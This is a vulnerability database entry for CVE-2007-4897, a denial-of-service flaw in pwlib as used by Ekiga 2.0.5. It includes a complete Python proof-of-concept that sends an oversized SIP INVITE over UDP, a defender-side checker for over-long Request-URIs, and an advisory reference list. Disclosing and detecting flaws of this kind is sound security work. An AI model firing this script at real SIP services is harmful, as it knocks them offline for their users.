Ekiga GetHostAddress Remote Denial of Service Vulnerability

Vulnerability ID: 1118185; Vulnerability type: Resource management error
Published: 2009-07-24; Updated: 2009-07-27
CVE ID: CVE-2007-4897; CNNVD-ID: CNNVD-200709-181
Platform: Windows; CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/9241
https://www.securityfocus.com/bid/25642
https://cxsecurity.com/issue/WLB-2007090055
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-181
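|Vulnerability details
pwlib, as used in Ekiga 2.0.5 and possibly other products, allows remote attackers to cause a denial of service by passing a long argument to the PString::vsprintf function. The issue is related to poor memory management.
|Vulnerability exploit (EXP)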
#!/usr/bin/env python
#
# Ekiga GetHostAddress Remote Denial of Service Vulnerability (CVE-2007-4897)
#
# ekiga207_dos.py by Jose Miguel Esparza
# 2007-09-11 S21sec labs

import sys,socket

if len(sys.argv) != 3: 
	sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE "+'A'*1005+" SIP/2.0\r\n"+\
                   "Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\r\n"+\
                   "Contact:sip:pepe@172.91.1.133:5060\r\n"+\
                   "Content-Length:417\r\n"+\
                   "Content-Type:application/sdp\r\n"+\
                   "CSeq:4321 INVITE\r\n"+\
                   "From:sip:pepe@172.91.1.148:5060;tag=a48s\r\n"+\
                   "Max-Forwards:70\r\n"+\
                   "To:sip:paco@micasa.com\r\n"+\
                   "Via:SIP/2.0/UDP 172.91.1.148:5060;branch=z9hG4bK74b76\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target,targetPort))
s.sendall(malformedRequest)
s.close()

# milw0rm.com [2009-07-24]
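
A defender-side check for the request shape used in the script above, as an added example that is not part of the original page or of Ekiga/pwlib: it parses the SIP start line of a UDP payload and flags an over-long Request-URI before the datagram reaches a SIP stack. The 256-byte limit, the function name and the sample datagrams are assumptions.

```python
# Added example (not from the original page): screen SIP datagrams for an
# over-long Request-URI, the field the script above fills with 1005 characters.
MAX_URI_LEN = 256  # assumption: local policy limit, not a value from the advisory


def check_sip_datagram(data: bytes, max_uri_len: int = MAX_URI_LEN):
    """Return (verdict, reason) for one UDP payload; verdict is pass/alert/drop."""
    line, sep, _ = data.partition(b"\r\n")
    if not sep:
        return ("drop", "no CRLF-terminated start line")
    try:
        text = line.decode("ascii")
    except UnicodeDecodeError:
        return ("drop", "non-ASCII start line")
    if text.startswith("SIP/2.0 "):
        return ("pass", "response")  # status line, carries no Request-URI
    parts = text.split(" ")
    # Request-Line = Method SP Request-URI SP SIP-Version
    if len(parts) != 3 or parts[2] != "SIP/2.0" or not parts[0] or not parts[1]:
        return ("drop", "malformed request line")
    method, uri, _ = parts
    if len(uri) > max_uri_len:
        return ("alert", "%s Request-URI is %d bytes (limit %d)"
                % (method, len(uri), max_uri_len))
    return ("pass", "ok")


# Constructed sample datagrams (not captured traffic).
BENIGN = (b"INVITE sip:paco@example.com SIP/2.0\r\n"
          b"Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bKexample\r\n"
          b"Max-Forwards: 70\r\n\r\n")
OVERSIZED = b"INVITE " + b"A" * 1005 + b" SIP/2.0\r\nMax-Forwards: 70\r\n\r\n"
RESPONSE = b"SIP/2.0 200 OK\r\n\r\n"
TRUNCATED = b"INVITE sip:paco@example.com SIP/2.0"

if __name__ == "__main__":
    for name, pkt in [("benign", BENIGN), ("oversized", OVERSIZED),
                      ("response", RESPONSE), ("truncated", TRUNCATED)]:
        print(name, check_sip_datagram(pkt))
```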
|Affected products
Ubuntu Ubuntu Linux 7.10 sparc
Ubuntu Ubuntu Linux 7.10 powerpc
Ubuntu Ubuntu Linux 7.10 i386
Ubuntu Ubuntu Linux 7.10 amd64
Ubuntu Ubuntu Linux 7.04 sparc
Ubuntu Ubuntu
|References

Source: MISC
Link: https://bugzilla.redhat.com/show_bug.cgi?id=292831
Source: XF
Name: ekiga-sipurlgethostaddress-dos(36568)
Link: http://xforce.iss.net/xforce/xfdb/36568
Source: SECTRACK
Name: 1018683
Link: http://www.securitytracker.com/id?1018683
Source: BID
Name: 25642
Link: http://www.securityfocus.com/bid/25642
Source: BUGTRAQ
Name: 20070912 S21SEC-036-EN Ekiga <= 2.0.5 Denial of service
Link: http://www.securityfocus.com/archive/1/archive/1/479185/100/0/threaded
Source: MISC
Link: http://www.s21sec.com/avisos/s21sec-036-en.txt
Source: REDHAT
Name: RHSA-2007:0932
Link: http://www.redhat.com/support/errata/RHSA-2007-0932.html
Source: MANDRIVA
Name: MDKSA-2007:206
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2007:206
Source: SREASON
Name: 3138
Link: http://securityreason.com/securityalert/3138
Source: SECUNIA
Name: 27518
Link: http://secunia.com/advisories/27518
Source: SECUNIA
Name: 27150
Link: http://secunia.com/advisories/27150
Source: SECUNIA
Name: 27127
Link: http://secunia.com/advisories/27127
Source: MISC
Link: http://openh323.cvs.sourceforge.net/openh323/opal/src/sip/sipcon.cxx?r1=2.120.2.25&r2=